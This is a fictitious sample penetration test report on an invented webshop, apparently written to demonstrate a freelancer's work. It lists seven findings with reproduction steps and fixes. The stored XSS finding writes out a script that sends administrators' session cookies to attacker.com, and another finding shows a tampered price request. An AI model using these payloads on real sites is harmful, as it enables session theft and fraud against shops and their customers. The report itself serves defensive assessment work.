⚠️ This is a fictitious example report. All company names, findings, and data are fabricated.

Web Application Security Assessment

Penetration Test Report

Client Acme Webshop B.V. (fictitious)
Target https://shop.acme-example.com
Tester Vincent de Vries — vdevries.nl
Date March 2026
Classification Confidential

1. Executive Summary

An authorised penetration test was conducted on the Acme Webshop web application between 10–14 March 2026. The assessment identified 7 vulnerabilities across three severity levels. Two critical issues were identified that could directly result in financial loss or unauthorised account access.

All testing was performed with explicit written authorisation. No production data was modified and no real transactions were completed.

2
Critical
2
High
2
Medium
1
Low

2. Findings Overview

# Title Severity Status
F-01 Price manipulation via client-side parameter Critical Open
F-02 Stored XSS in order notes field Critical Open
F-03 IDOR on order PDF endpoint High Open
F-04 No rate limiting on login endpoint High Fixed
F-05 Missing server-side date validation Medium Open
F-06 Verbose error messages expose stack traces Medium Fixed
F-07 Missing security headers (CSP, HSTS) Low Open

3. Detailed Findings

F-01 Price manipulation via client-side parameter Critical
CVSS Score9.1
CategoryBusiness Logic
OWASPA04 — Insecure Design

Description

The add-to-cart request includes a price parameter that is accepted and processed server-side without validation. An attacker can set an arbitrary price — including zero or negative values — for any product.

Reproduction Steps

  1. Add any product to the cart and intercept the request using browser DevTools
  2. Modify the price parameter to 0.01
  3. Forward the request — the cart reflects the manipulated price
  4. Complete checkout — the order is confirmed at the manipulated price

Evidence

POST /api/cart/add HTTP/1.1 Host: shop.acme-example.com product_id=1042&qty=1&price=0.01&size=L

Request with manipulated price parameter. Server responded with 200 OK and confirmed price of €0.01.

Impact

Any authenticated or guest user can purchase products at an arbitrary price, resulting in direct financial loss for the organisation.

Recommendation

Remove the price parameter from all client-facing requests. Prices must be determined exclusively server-side based on the product ID. Never trust client-supplied pricing data.

F-02 Stored XSS in order notes field Critical
CVSS Score8.8
CategoryInjection
OWASPA03 — Injection

Description

The order notes field during checkout accepts and stores unsanitised HTML and JavaScript. When an administrator views the order in the backend, the stored script executes in their browser session.

Reproduction Steps

  1. Place an order and enter the following in the order notes field:
<script>document.location='https://attacker.com/steal?c='+document.cookie</script>
  1. Complete the order
  2. When an administrator opens the order in the backend panel, the script executes and their session cookie is exfiltrated

Impact

Full administrator session takeover. An attacker gains access to all customer data, order history, and backend functionality without knowing any credentials.

Recommendation

  • Sanitise all user input server-side using an allowlist approach (e.g. htmlspecialchars() in PHP)
  • Implement a Content Security Policy (CSP) header to prevent inline script execution
  • Escape all output in HTML contexts
F-03 IDOR on order PDF endpoint High
CVSS Score7.5
CategoryBroken Access Control
OWASPA01 — Broken Access Control

Description

The order confirmation PDF is accessible via a predictable sequential URL. Any authenticated user can access PDFs belonging to other customers by incrementing the order ID.

Reproduction Steps

  1. Place an order — receive confirmation PDF at /files/order/10482.pdf
  2. Modify the order ID to 10481, 10480, etc.
  3. PDFs of other customers load successfully, containing name, address, and order details

Impact

Personal data of all customers (name, address, email, order contents) is accessible to any authenticated user. This constitutes a GDPR data breach.

Recommendation

Verify server-side that the requesting user is the owner of the requested order before serving the PDF. Alternatively, use cryptographically random, non-guessable tokens in the URL instead of sequential IDs.

F-04 No rate limiting on login endpoint High
CVSS Score7.3
CategoryAuthentication
OWASPA07 — Identification and Authentication Failures

Description

The login endpoint /account/login has no rate limiting or account lockout mechanism. An attacker can attempt unlimited password guesses programmatically.

Reproduction Steps

  1. Send repeated POST requests to /account/login with a known username
  2. No lockout or CAPTCHA is triggered after hundreds of attempts
  3. A dictionary attack against common passwords is feasible

Recommendation

Implement rate limiting (e.g. max 5 attempts per 15 minutes per IP), account lockout after repeated failures, and CAPTCHA for suspicious activity.

✔ Fixed during engagement Rate limiting was implemented by the development team on 13 March 2026.
F-05 Missing server-side date validation Medium

Booking dates are validated client-side only. By manipulating the date parameter in the API request, it is possible to book for dates in the past or far in the future beyond the allowed booking window.

Recommendation

Validate all date parameters server-side against the actual availability calendar. Reject requests with dates outside the permitted range with an appropriate error response.

F-06 Verbose error messages expose stack traces Medium

Certain invalid requests trigger unhandled exceptions that return full PHP stack traces including file paths, database table names, and internal function calls. This information aids an attacker in mapping the application internals.

Recommendation

Disable debug mode in production. Return generic error messages to the client and log detailed errors server-side only.

✔ Fixed during engagement
F-07 Missing security headers Low

The application is missing several recommended HTTP security headers: Content-Security-Policy, X-Content-Type-Options, and Referrer-Policy. While not directly exploitable, their absence increases the attack surface.

Recommendation

Add the following headers to all responses via the web server configuration:

Content-Security-Policy: default-src 'self' X-Content-Type-Options: nosniff Referrer-Policy: strict-origin-when-cross-origin Permissions-Policy: geolocation=(), microphone=()

4. Conclusions & Recommendations

The assessment revealed significant security weaknesses in the application's input validation, access control, and business logic. The two critical findings (F-01, F-02) should be treated as immediate priorities as they pose a direct risk of financial loss and data compromise.

The following remediation priority order is recommended:

  1. Immediate (within 48 hours): F-01 price manipulation, F-02 stored XSS
  2. Short term (within 2 weeks): F-03 IDOR on order PDFs
  3. Medium term (within 1 month): F-05 date validation, F-07 security headers

A follow-up retest is recommended after remediation of the critical and high findings to verify that fixes are effective and have not introduced new issues.

5. Methodology & Scope

Testing was performed manually using browser DevTools, custom scripts, and standard security tooling. The assessment followed the OWASP Web Security Testing Guide (WSTG v4.2) and covered the following areas:

  • Authentication and session management
  • Access control and authorisation
  • Input validation and injection
  • Business logic
  • API security
  • Information disclosure
  • Security headers and configuration

Out of scope: Infrastructure, network layer, third-party integrations, social engineering.

Vincent de Vries — Freelance Cybersecurity
vdevries.nl · contact@vdevries.nl
This is a fictitious sample report. All data, company names, and findings are fabricated for demonstration purposes.